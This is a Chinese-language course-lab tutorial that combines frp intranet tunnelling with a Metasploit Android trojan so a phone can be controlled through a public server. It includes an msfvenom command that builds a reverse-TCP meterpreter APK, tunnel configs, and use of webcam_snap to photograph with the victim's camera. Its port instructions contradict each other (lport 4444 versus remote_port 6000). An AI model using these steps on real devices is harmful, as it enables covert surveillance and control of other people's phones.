MSF-Android课程实验

MSF-Android课程实验,使用frp做内网穿透来控制木马。

1

总述

在实践课上有布置frp内网穿透(内网到公网)和简单的msf木马使用(木马只能内网通信)的任务。此处将两者结合,把木马链接到服务器上,经过内网穿透在本地控制木马。都是入门级实践。

准备

frp代码下载:https://github.com/fatedier/frp/releases?tdsourcetag=s_pctim_aiomsg
内网 kali虚拟机
公网 Ubuntu服务器
android手机一台

部署frps

到上述链接下载对应代码到服务器和本地。
或者使用命令wget https://github.com/fatedier/frp/releases/download/v0.21.0/frp_0.21.0_linux_amd64.tar.gz

解压

1
tar -zxvf frp_0.21.0_linux_amd64.tar.gz

进入目录frp_0.21.0_linux_amd64编辑frps.ini

  1. vim frps.ini进入编辑,insert键开始编辑,esc键停止编辑,shift+Z+Z保存并退出。
  2. bind_port是自己设定的frp服务端端口
  3. vhost_http_port是自己设定的http访问端口。
  4. 执行./frps启动frp服务器端的服务

2

配置frpc

客户端的操作与服务器端类似,具体参数不同而已。

1
2
3
4
5
6
# 编辑frpc.ini :
server_addr = x.x.x.x #设置公网服务器的ip地址
server_port = 7000
local_ip = 127.0.0.1 #设置本地的ip
local_port = 4444 #内网提供的端口,为后续使用msf,此处监听4444端口
remote_port = 6000 #公网映射的端口

3

执行./frpc启动frpc服务
两端服务连接成功的提示

4

利用msf生成一个简单木马

msfvenom -p android/meterpreter/reverse_tcp lhost=serverIP lport=4444 R > horse.apk

lhost指向公网服务器ip
lport与fpc.ini的remote_port相同

5

确保frp连接畅通,木马安装并开始运行,输入exploit并回车
webcam_snap拍摄照片(默认后置摄像头)

6

其他命令

7

Welcome to my other publishing channels